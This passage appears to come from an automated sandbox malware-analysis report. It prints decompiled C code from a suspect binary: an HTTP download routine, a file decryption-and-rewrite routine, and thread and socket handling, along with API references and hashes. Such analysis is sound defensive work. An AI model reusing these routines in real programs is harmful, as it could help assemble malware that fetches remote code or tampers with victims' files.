                                                                                  • CloseHandle.KERNEL32(?,?,?,0040F024), ref: 0040E584
                                                                                  • CloseHandle.KERNEL32(?,?,?,0040F024), ref: 0040E58A
                                                                                  • WSACloseEvent.WS2_32(?), ref: 0040E590
                                                                                  • DeleteCriticalSection.KERNEL32(00000020,?,?,?,0040F024), ref: 0040E5A6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Interlocked$CloseCriticalSection$DecrementEventHandle$CompletionDeleteEnterExchangeIncrementLeavePostQueuedStatus
                                                                                  • String ID: PCOI$ilci
                                                                                  • API String ID: 2403999931-3762367603
                                                                                  • Opcode ID: 8dd6da6e97fa57f1a7193440fcc103113cb784ba75cd11bc1955a2a87b358bb7
                                                                                  • Instruction ID: 93d8e349b18169af685d7a21951132cbb8c9c0fe64a1f5b9dbcdc35934fd6ed3
                                                                                  • Opcode Fuzzy Hash: 8dd6da6e97fa57f1a7193440fcc103113cb784ba75cd11bc1955a2a87b358bb7
                                                                                  • Instruction Fuzzy Hash: D3317475500705BBC710DBB1EC48B97B7A8BF08314F048E2EE95AA3691D778F864CB98
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  C-Code - Quality: 68%
                                                                                  			E00404000() {
                                                                                  				struct HWND__* _v8;
                                                                                  				struct tagMSG _v36;
                                                                                  				struct _WNDCLASSEXW _v84;
                                                                                  				short _v596;
                                                                                  				unsigned int _t20;
                                                                                  				void* _t39;
                                                                                  				void* _t40;
                                                                                  
                                                                                  				do {
                                                                                  					_v84.cbSize = 0;
                                                                                  					memset( &(_v84.style), 0, 0x2c);
                                                                                  					_t40 = _t39 + 0xc;
                                                                                  					_v84.cbSize = 0x30;
                                                                                  					_v84.lpfnWndProc = E00403DB0;
                                                                                  					_v84.hInstance = GetModuleHandleW(0);
                                                                                  					_v84.lpszClassName =  &_v596;
                                                                                  					do {
                                                                                  						Sleep(1);
                                                                                  						_t20 = GetTickCount();
                                                                                  						wsprintfW( &_v596, L"%x%X", GetTickCount(), _t20 >> 1);
                                                                                  						_t40 = _t40 + 0x10;
                                                                                  					} while ((RegisterClassExW( &_v84) & 0x0000ffff) == 0);
                                                                                  					_v8 = CreateWindowExW(0, _v84.lpszClassName, 0, 0, 0, 0, 0, 0, 0xfffffffd, 0, _v84.hInstance, 0);
                                                                                  					if(_v8 != 0) {
                                                                                  						while(GetMessageA( &_v36, 0, 0, 0) > 0) {
                                                                                  							TranslateMessage( &_v36);
                                                                                  							DispatchMessageA( &_v36);
                                                                                  						}
                                                                                  						goto L7;
                                                                                  					}
                                                                                  					break;
                                                                                  					L7:
                                                                                  				} while (0 != 0);
                                                                                  				ExitThread(0);
                                                                                  			}










                                                                                  0x00404009
                                                                                  0x00404009
                                                                                  0x00404018
                                                                                  0x0040401d
                                                                                  0x00404020
                                                                                  0x00404027
                                                                                  0x00404036
                                                                                  0x0040403f
                                                                                  0x00404042
                                                                                  0x00404044
                                                                                  0x0040404a
                                                                                  0x00404066
                                                                                  0x0040406c
                                                                                  0x0040407c
                                                                                  0x004040a2
                                                                                  0x004040a9
                                                                                  0x004040ad
                                                                                  0x004040c5
                                                                                  0x004040cf
                                                                                  0x004040cf
                                                                                  0x00000000
                                                                                  0x004040ad
                                                                                  0x00000000
                                                                                  0x004040d7
                                                                                  0x004040d7
                                                                                  0x004040e1

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Message$CountTick$ClassCreateDispatchExitHandleModuleRegisterSleepThreadTranslateWindowmemsetwsprintf
                                                                                  • String ID: %x%X$0
                                                                                  • API String ID: 716646876-225668902
                                                                                  • Opcode ID: f6d5b7525540a58df187482176236c9ba1dfeb2eb460690e0bb65cbcf38e7b1f
                                                                                  • Instruction ID: 19d221db94b3e63cef1269c4be0118e099b5cb739eae60d914623c84e45eccf5
                                                                                  • Opcode Fuzzy Hash: f6d5b7525540a58df187482176236c9ba1dfeb2eb460690e0bb65cbcf38e7b1f
                                                                                  • Instruction Fuzzy Hash: 3021F170A40318ABEB109BE0DC49FEE7B78BB44701F508129F705B61D0DBB955448B59
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 530 40c610-40c6ab memset InternetCrackUrlA InternetOpenA 531 40c6b1-40c6e4 InternetConnectA 530->531 532 40c827-40c830 530->532 533 40c81a-40c821 InternetCloseHandle 531->533 534 40c6ea-40c71a HttpOpenRequestA 531->534 533->532 535 40c720-40c737 HttpSendRequestA 534->535 536 40c80d-40c814 InternetCloseHandle 534->536 537 40c800-40c807 InternetCloseHandle 535->537 538 40c73d-40c741 535->538 536->533 537->536 539 40c7f6 538->539 540 40c747 538->540 539->537 541 40c751-40c758 540->541 542 40c7e9-40c7f4 541->542 543 40c75e-40c780 InternetReadFile 541->543 542->537 544 40c782-40c789 543->544 545 40c78b 543->545 544->545 546 40c78d-40c7e4 call 408ea0 memcpy 544->546 545->542 546->541
                                                                                  C-Code - Quality: 82%
                                                                                  			E0040C610(char* _a4, char** _a8) {
                                                                                  				char _v260;
                                                                                  				char _v772;
                                                                                  				long _v776;
                                                                                  				void* _v780;
                                                                                  				intOrPtr _v792;
                                                                                  				char* _v796;
                                                                                  				signed short _v816;
                                                                                  				intOrPtr _v820;
                                                                                  				char* _v824;
                                                                                  				void _v836;
                                                                                  				void* _v840;
                                                                                  				void* _v844;
                                                                                  				void* _v848;
                                                                                  				char* _v852;
                                                                                  				void _v1876;
                                                                                  				long _v1880;
                                                                                  				void* _t91;
                                                                                  				void* _t92;
                                                                                  
                                                                                  				_v776 = 0;
                                                                                  				_v840 = 0;
                                                                                  				memset( &_v836, 0, 0x38);
                                                                                  				_t92 = _t91 + 0xc;
                                                                                  				_v840 = 0x3c;
                                                                                  				_v824 =  &_v260;
                                                                                  				_v820 = 0x100;
                                                                                  				_v796 =  &_v772;
                                                                                  				_v792 = 0x200;
                                                                                  				InternetCrackUrlA(_a4, 0, 0x10000000,  &_v840);
                                                                                  				_v780 = InternetOpenA(0, 1, 0, 0, 0);
                                                                                  				if(_v780 != 0) {
                                                                                  					_v844 = InternetConnectA(_v780,  &_v260, _v816 & 0x0000ffff, 0, 0, 3, 0, 0);
                                                                                  					if(_v844 != 0) {
                                                                                  						_v848 = HttpOpenRequestA(_v844, "GET",  &_v772, 0, 0, 0, 0, 0);
                                                                                  						if(_v848 != 0) {
                                                                                  							if(HttpSendRequestA(_v848, 0, 0, 0, 0) != 0) {
                                                                                  								if(_a8 == 0) {
                                                                                  									_v776 = 1;
                                                                                  								} else {
                                                                                  									_v852 = 0;
                                                                                  									while(1 != 0) {
                                                                                  										_t87 = _v848;
                                                                                  										if(InternetReadFile(_v848,  &_v1876, 0x400,  &_v1880) != 0 && _v1880 != 0) {
                                                                                  											_v776 = E00408EA0(_v776, _t87, _v776,  &(_v852[_v1880]));
                                                                                  											memcpy( &(_v852[_v776]),  &_v1876, _v1880);
                                                                                  											_t92 = _t92 + 0x14;
                                                                                  											_v852 =  &(_v852[_v1880]);
                                                                                  											continue;
                                                                                  										}
                                                                                  										break;
                                                                                  									}
                                                                                  									 *_a8 = _v852;
                                                                                  								}
                                                                                  							}
                                                                                  							InternetCloseHandle(_v848);
                                                                                  						}
                                                                                  						InternetCloseHandle(_v844);
                                                                                  					}
                                                                                  					InternetCloseHandle(_v780);
                                                                                  				}
                                                                                  				return _v776;
                                                                                  			}





















                                                                                  0x0040c619
                                                                                  0x0040c623
                                                                                  0x0040c638
                                                                                  0x0040c63d
                                                                                  0x0040c640
                                                                                  0x0040c650
                                                                                  0x0040c656
                                                                                  0x0040c666
                                                                                  0x0040c66c
                                                                                  0x0040c688
                                                                                  0x0040c69e
                                                                                  0x0040c6ab
                                                                                  0x0040c6d7
                                                                                  0x0040c6e4
                                                                                  0x0040c70d
                                                                                  0x0040c71a
                                                                                  0x0040c737
                                                                                  0x0040c741
                                                                                  0x0040c7f6
                                                                                  0x0040c747
                                                                                  0x0040c747
                                                                                  0x0040c751
                                                                                  0x0040c771
                                                                                  0x0040c780
                                                                                  0x0040c7a9
                                                                                  0x0040c7ca
                                                                                  0x0040c7cf
                                                                                  0x0040c7de
                                                                                  0x00000000
                                                                                  0x0040c7de
                                                                                  0x00000000
                                                                                  0x0040c780
                                                                                  0x0040c7f2
                                                                                  0x0040c7f2
                                                                                  0x0040c741
                                                                                  0x0040c807
                                                                                  0x0040c807
                                                                                  0x0040c814
                                                                                  0x0040c814
                                                                                  0x0040c821
                                                                                  0x0040c821
                                                                                  0x0040c830

                                                                                  APIs
                                                                                  • memset.NTDLL ref: 0040C638
                                                                                  • InternetCrackUrlA.WININET(0040D429,00000000,10000000,0000003C), ref: 0040C688
                                                                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040C698
                                                                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040C6D1
                                                                                  • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040C707
                                                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040C72F
                                                                                  • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040C778
                                                                                  • memcpy.NTDLL(00000000,?,00000000), ref: 0040C7CA
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040C807
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040C814
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040C821
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectCrackFileReadSendmemcpymemset
                                                                                  • String ID: <$GET
                                                                                  • API String ID: 1205665004-427699995
                                                                                  • Opcode ID: ec5765e5f3d83dd079881a4ae8b9933272d244356d4eee572d68266342c5080b
                                                                                  • Instruction ID: 09436683f8244ffa9c701ea93985ed9ede5934815d9b1926990d38fc667447ad
                                                                                  • Opcode Fuzzy Hash: ec5765e5f3d83dd079881a4ae8b9933272d244356d4eee572d68266342c5080b
                                                                                  • Instruction Fuzzy Hash: 29512C759012289BDB35CB50CC99BD9B3BCAB48705F1081E9E60DAA2C0D7B86FC4CF58
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 80%
                                                                                  			E0040C040(LONG* _a4, intOrPtr _a8) {
                                                                                  				int _v8;
                                                                                  				long _v12;
                                                                                  				LONG* _v16;
                                                                                  				signed char _v17;
                                                                                  				long _v24;
                                                                                  				signed int _v28;
                                                                                  				signed int _t57;
                                                                                  				intOrPtr _t80;
                                                                                  
                                                                                  				_v8 = GetThreadPriority(GetCurrentThread());
                                                                                  				SetThreadPriority(GetCurrentThread(), 0xfffffffe);
                                                                                  				_v12 = 0;
                                                                                  				if(_a4 != 0) {
                                                                                  					_v16 = _a4;
                                                                                  					if(InterlockedExchangeAdd(_v16, 0) > 0) {
                                                                                  						_v17 = 0 | _a8 != 0xffffffff;
                                                                                  						while(1 != 0) {
                                                                                  							_v24 = 0;
                                                                                  							EnterCriticalSection( &(_v16[1]));
                                                                                  							_v28 = 0;
                                                                                  							while(_v28 <  *_v16) {
                                                                                  								if( *(_v16[7] + _v28 * 4) != 0) {
                                                                                  									_t57 = WaitForSingleObject( *(_v16[7] + _v28 * 4), 0);
                                                                                  									asm("sbb eax, eax");
                                                                                  									_v24 =  ~_t57 + 1 + _v24;
                                                                                  								} else {
                                                                                  									_v24 = _v24 + 1;
                                                                                  								}
                                                                                  								_v28 = _v28 + 1;
                                                                                  							}
                                                                                  							LeaveCriticalSection( &(_v16[1]));
                                                                                  							if(_v24 !=  *_v16) {
                                                                                  								if((_v17 & 0x000000ff) == 0) {
                                                                                  									L15:
                                                                                  									Sleep(1);
                                                                                  									continue;
                                                                                  								} else {
                                                                                  									_t80 = _a8 - 1;
                                                                                  									_a8 = _t80;
                                                                                  									if(_t80 != 0) {
                                                                                  										goto L15;
                                                                                  									} else {
                                                                                  									}
                                                                                  								}
                                                                                  							} else {
                                                                                  								_v12 = 1;
                                                                                  							}
                                                                                  							goto L16;
                                                                                  						}
                                                                                  					}
                                                                                  				}
                                                                                  				L16:
                                                                                  				SetThreadPriority(GetCurrentThread(), _v8);
                                                                                  				return _v12;
                                                                                  			}











                                                                                  0x0040c053
                                                                                  0x0040c05f
                                                                                  0x0040c065
                                                                                  0x0040c070
                                                                                  0x0040c079
                                                                                  0x0040c08a
                                                                                  0x0040c099
                                                                                  0x0040c09c
                                                                                  0x0040c0a9
                                                                                  0x0040c0b7
                                                                                  0x0040c0bd
                                                                                  0x0040c0cf
                                                                                  0x0040c0e6
                                                                                  0x0040c102
                                                                                  0x0040c10a
                                                                                  0x0040c112
                                                                                  0x0040c0e8
                                                                                  0x0040c0ee
                                                                                  0x0040c0ee
                                                                                  0x0040c0cc
                                                                                  0x0040c0cc
                                                                                  0x0040c11e
                                                                                  0x0040c12c
                                                                                  0x0040c13d
                                                                                  0x0040c14c
                                                                                  0x0040c14e
                                                                                  0x00000000
                                                                                  0x0040c13f
                                                                                  0x0040c142
                                                                                  0x0040c145
                                                                                  0x0040c148
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040c14a
                                                                                  0x0040c148
                                                                                  0x0040c12e
                                                                                  0x0040c12e
                                                                                  0x0040c12e
                                                                                  0x00000000
                                                                                  0x0040c12c
                                                                                  0x0040c09c
                                                                                  0x0040c08a
                                                                                  0x0040c159
                                                                                  0x0040c164
                                                                                  0x0040c170

                                                                                  APIs
                                                                                  • GetCurrentThread.KERNEL32 ref: 0040C046
                                                                                  • GetThreadPriority.KERNEL32(00000000,?,0040E56E,?,000000FF,?,0040F024), ref: 0040C04D
                                                                                  • GetCurrentThread.KERNEL32 ref: 0040C058
                                                                                  • SetThreadPriority.KERNEL32(00000000,?,0040E56E,?,000000FF,?,0040F024), ref: 0040C05F
                                                                                  • InterlockedExchangeAdd.KERNEL32(000000FF,00000000), ref: 0040C082
                                                                                  • EnterCriticalSection.KERNEL32(000000FB), ref: 0040C0B7
                                                                                  • WaitForSingleObject.KERNEL32(000000FF,00000000), ref: 0040C102
                                                                                  • LeaveCriticalSection.KERNEL32(000000FB), ref: 0040C11E
                                                                                  • Sleep.KERNEL32(00000001), ref: 0040C14E
                                                                                  • GetCurrentThread.KERNEL32 ref: 0040C15D
                                                                                  • SetThreadPriority.KERNEL32(00000000,?,0040E56E,?,000000FF), ref: 0040C164
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Thread$CurrentPriority$CriticalSection$EnterExchangeInterlockedLeaveObjectSingleSleepWait
                                                                                  • String ID:
                                                                                  • API String ID: 3862671961-0
                                                                                  • Opcode ID: 5b3e761f1863bbc4b3393cbcc79310fac30a5adf336bc6d3d95560012fa03e52
                                                                                  • Instruction ID: b67d03a003be484ef9903f40ca498cf56af242f5343ef7d43787b118d94c6999
                                                                                  • Opcode Fuzzy Hash: 5b3e761f1863bbc4b3393cbcc79310fac30a5adf336bc6d3d95560012fa03e52
                                                                                  • Instruction Fuzzy Hash: E9414C74900209EBDB14DFA4D884BAEBB71FB48305F108266E915BB381D7799A81CF99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 83%
                                                                                  			E0040D580(WCHAR* _a4) {
                                                                                  				void* _v8;
                                                                                  				long _v12;
                                                                                  				void* _v16;
                                                                                  				DWORD* _v20;
                                                                                  				char _v21;
                                                                                  				void* _v28;
                                                                                  				void* _v32;
                                                                                  				char _v48;
                                                                                  				DWORD* _t70;
                                                                                  				void* _t73;
                                                                                  				void* _t103;
                                                                                  
                                                                                  				_v21 = 0;
                                                                                  				_v12 = 0;
                                                                                  				_v20 = 0;
                                                                                  				_v8 = 0;
                                                                                  				_v16 = CreateFileW(_a4, 0x80000000, 0, 0, 3, 0, 0);
                                                                                  				if(_v16 == 0xffffffff) {
                                                                                  					L12:
                                                                                  					if(_v8 != 0) {
                                                                                  						_v16 = CreateFileW(_a4, 0x40000000, 0, 0, 2, 0, 0);
                                                                                  						if(_v16 != 0xffffffff) {
                                                                                  							_v21 = 1;
                                                                                  							WriteFile(_v16, _v8, _v12,  &_v12, 0);
                                                                                  							CloseHandle(_v16);
                                                                                  						}
                                                                                  						E00408FB0(_v8);
                                                                                  					}
                                                                                  					return _v21;
                                                                                  				}
                                                                                  				_v28 = CreateFileMappingW(_v16, 0, 2, 0, 0, 0);
                                                                                  				if(_v28 == 0) {
                                                                                  					L11:
                                                                                  					CloseHandle(_v16);
                                                                                  					goto L12;
                                                                                  				}
                                                                                  				_v32 = MapViewOfFile(_v28, 4, 0, 0, 0);
                                                                                  				if(_v32 == 0) {
                                                                                  					L10:
                                                                                  					CloseHandle(_v28);
                                                                                  					goto L11;
                                                                                  				} else {
                                                                                  					_v12 = GetFileSize(_v16, 0);
                                                                                  					if(_v12 > 0x100) {
                                                                                  						_t70 = E0040B4C0(_v32, _v32);
                                                                                  						_t103 = _t103 + 4;
                                                                                  						_v20 = _t70;
                                                                                  						if(_v20 != 0 && _v20[6] == _v12 - 0x100) {
                                                                                  							_v12 = _v20[6];
                                                                                  							_t73 = E0040AE60(_v32 + 0x100,  &(_v20[2]), 0x10, _v32 + 0x100, _v12);
                                                                                  							_t103 = _t103 + 0x10;
                                                                                  							_v8 = _t73;
                                                                                  							if(_v8 != 0) {
                                                                                  								E00409800(_v8, _v12,  &_v48);
                                                                                  								_t103 = _t103 + 0xc;
                                                                                  								asm("repe cmpsd");
                                                                                  								if(0 != 0) {
                                                                                  									E00408FB0(_v8);
                                                                                  									_t103 = _t103 + 4;
                                                                                  									_v8 = 0;
                                                                                  								}
                                                                                  							}
                                                                                  						}
                                                                                  					}
                                                                                  					UnmapViewOfFile(_v32);
                                                                                  					goto L10;
                                                                                  				}
                                                                                  			}














                                                                                  0x0040d588
                                                                                  0x0040d58c
                                                                                  0x0040d593
                                                                                  0x0040d59a
                                                                                  0x0040d5ba
                                                                                  0x0040d5c1
                                                                                  0x0040d6d3
                                                                                  0x0040d6d7
                                                                                  0x0040d6f2
                                                                                  0x0040d6f9
                                                                                  0x0040d6fb
                                                                                  0x0040d711
                                                                                  0x0040d71b
                                                                                  0x0040d71b
                                                                                  0x0040d725
                                                                                  0x0040d72a
                                                                                  0x0040d735
                                                                                  0x0040d735
                                                                                  0x0040d5db
                                                                                  0x0040d5e2
                                                                                  0x0040d6c9
                                                                                  0x0040d6cd
                                                                                  0x00000000
                                                                                  0x0040d6cd
                                                                                  0x0040d5fa
                                                                                  0x0040d601
                                                                                  0x0040d6bf
                                                                                  0x0040d6c3
                                                                                  0x00000000
                                                                                  0x0040d607
                                                                                  0x0040d613
                                                                                  0x0040d61d
                                                                                  0x0040d627
                                                                                  0x0040d62c
                                                                                  0x0040d62f
                                                                                  0x0040d636
                                                                                  0x0040d64f
                                                                                  0x0040d669
                                                                                  0x0040d66e
                                                                                  0x0040d671
                                                                                  0x0040d678
                                                                                  0x0040d686
                                                                                  0x0040d68b
                                                                                  0x0040d69e
                                                                                  0x0040d6a0
                                                                                  0x0040d6a6
                                                                                  0x0040d6ab
                                                                                  0x0040d6ae
                                                                                  0x0040d6ae
                                                                                  0x0040d6a0
                                                                                  0x0040d678
                                                                                  0x0040d636
                                                                                  0x0040d6b9
                                                                                  0x00000000
                                                                                  0x0040d6b9

                                                                                  APIs
                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040D5B4
                                                                                  • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040D5D5
                                                                                  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040D5F4
                                                                                  • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040D60D
                                                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 0040D6B9
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040D6C3
                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 0040D6CD
                                                                                  • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040D6EC
                                                                                  • WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 0040D711
                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 0040D71B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$CloseCreateHandle$View$MappingSizeUnmapWrite
                                                                                  • String ID:
                                                                                  • API String ID: 171974401-0
                                                                                  • Opcode ID: 0f9f188c6dc80e39ad04ba57d57415bc9a5561ea4dd1a5a43cd4d3438c38bcb4
                                                                                  • Instruction ID: abd0401628c18b29deb1849a45b8fcca8b7b44c39020343394329d6e44a62b50
                                                                                  • Opcode Fuzzy Hash: 0f9f188c6dc80e39ad04ba57d57415bc9a5561ea4dd1a5a43cd4d3438c38bcb4
                                                                                  • Instruction Fuzzy Hash: 06514DB5E00208FBDB14DFE4CC49BEEB775AB48704F108569E615772C0D7B96A84CB98
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 79%
                                                                                  			E0040EBE0(void* __eax, long __ebx, void* __ecx, short _a4, short _a6) {
                                                                                  				long _v4;
                                                                                  				intOrPtr _v8;
                                                                                  				intOrPtr _v12;
                                                                                  				intOrPtr _v16;
                                                                                  				intOrPtr _v20;
                                                                                  				intOrPtr _v24;
                                                                                  				char _v28;
                                                                                  				void* __esi;
                                                                                  				intOrPtr _t59;
                                                                                  				intOrPtr _t64;
                                                                                  				void* _t73;
                                                                                  				void* _t106;
                                                                                  				void* _t108;
                                                                                  
                                                                                  				_t108 = __eax;
                                                                                  				_t106 = __ecx;
                                                                                  				if(_a4 != 0 || __ebx == 0) {
                                                                                  					InterlockedDecrement(_t108 + 0x14);
                                                                                  					_a4 = 1;
                                                                                  					_t59 =  *((intOrPtr*)(_t106 + 0x260));
                                                                                  					 *((char*)(_t106 + 0x275)) = 1;
                                                                                  					_a6 = 0;
                                                                                  					__imp__#21(_t59, 0xffff, 0x80,  &_a4, 4);
                                                                                  					__imp__#3( *((intOrPtr*)(_t106 + 0x260)));
                                                                                  					 *((intOrPtr*)(_t106 + 0x260)) = 0xffffffff;
                                                                                  					return _t59;
                                                                                  				}
                                                                                  				InterlockedExchange(_t106 + 4, E0040C210());
                                                                                  				_t64 =  *((intOrPtr*)(_t108 + 0x18));
                                                                                  				if(_t64 == 0) {
                                                                                  					if( *((char*)(_t106 + 0x275)) == 0) {
                                                                                  						 *((intOrPtr*)(_t108 + 0x28)) =  *((intOrPtr*)(_t108 + 0x28)) + __ebx;
                                                                                  						if( *((intOrPtr*)(_t108 + 0x28)) >=  *((intOrPtr*)(_t108 + 0x24))) {
                                                                                  							InterlockedDecrement(_t108 + 0x14);
                                                                                  							_v24 =  *((intOrPtr*)(_t106 + 0x268));
                                                                                  							_v20 =  *((intOrPtr*)(_t106 + 0x26c));
                                                                                  							_v12 =  *((intOrPtr*)(_t106 + 0x278));
                                                                                  							_v28 =  *((intOrPtr*)(_t106 + 0x264));
                                                                                  							_v8 =  *((intOrPtr*)(_t108 + 0x30));
                                                                                  							_v16 =  *((intOrPtr*)(_t106 + 0x270));
                                                                                  							_v4 =  *((intOrPtr*)(_t108 + 0x28));
                                                                                  							return E0040E5C0(2, _t106,  *((intOrPtr*)(_t106 + 0x27c)),  &_v28);
                                                                                  						} else {
                                                                                  							 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t108 + 0x20)) + __ebx;
                                                                                  							 *((intOrPtr*)(_t108 + 0x1c)) =  *((intOrPtr*)(_t108 + 0x1c)) - __ebx;
                                                                                  							_push(_t106);
                                                                                  							return E0040E960(_t108);
                                                                                  						}
                                                                                  					} else {
                                                                                  						return InterlockedDecrement(_t108 + 0x14);
                                                                                  					}
                                                                                  				} else {
                                                                                  					_t73 = _t64 - 1;
                                                                                  					if(_t73 != 0) {
                                                                                  						L14:
                                                                                  						return _t73;
                                                                                  					} else {
                                                                                  						if( *((intOrPtr*)(_t106 + 0x275)) == _t73) {
                                                                                  							InterlockedDecrement(_t106 + 0x21c);
                                                                                  							InterlockedExchangeAdd( *((intOrPtr*)(_t106 + 0x27c)) + 0x44, __ebx);
                                                                                  							_v28 =  *((intOrPtr*)(_t106 + 0x264));
                                                                                  							_v24 =  *((intOrPtr*)(_t106 + 0x268));
                                                                                  							_v16 =  *((intOrPtr*)(_t106 + 0x270));
                                                                                  							_v20 =  *((intOrPtr*)(_t106 + 0x26c));
                                                                                  							_v12 =  *((intOrPtr*)(_t106 + 0x278));
                                                                                  							_v8 = _t106 + 8;
                                                                                  							_v4 = __ebx;
                                                                                  							E0040E5C0(3, _t106,  *((intOrPtr*)(_t106 + 0x27c)),  &_v28);
                                                                                  							_t73 = E0040EB70(_t106);
                                                                                  							if(_t73 != 0) {
                                                                                  								goto L14;
                                                                                  							} else {
                                                                                  								 *((char*)(_t106 + 0x275)) = 1;
                                                                                  								return _t73;
                                                                                  							}
                                                                                  						} else {
                                                                                  							return InterlockedDecrement(_t106 + 0x21c);
                                                                                  						}
                                                                                  					}
                                                                                  				}
                                                                                  			}
















                                                                                  0x0040ebea
                                                                                  0x0040ebec
                                                                                  0x0040ebee
                                                                                  0x0040ed76
                                                                                  0x0040ed8d
                                                                                  0x0040ed92
                                                                                  0x0040eda0
                                                                                  0x0040eda7
                                                                                  0x0040edac
                                                                                  0x0040edb9
                                                                                  0x0040edbf
                                                                                  0x00000000
                                                                                  0x0040edbf
                                                                                  0x0040ec06
                                                                                  0x0040ec0f
                                                                                  0x0040ec12
                                                                                  0x0040ecd5
                                                                                  0x0040ece7
                                                                                  0x0040ecf0
                                                                                  0x0040ed0b
                                                                                  0x0040ed23
                                                                                  0x0040ed2d
                                                                                  0x0040ed34
                                                                                  0x0040ed38
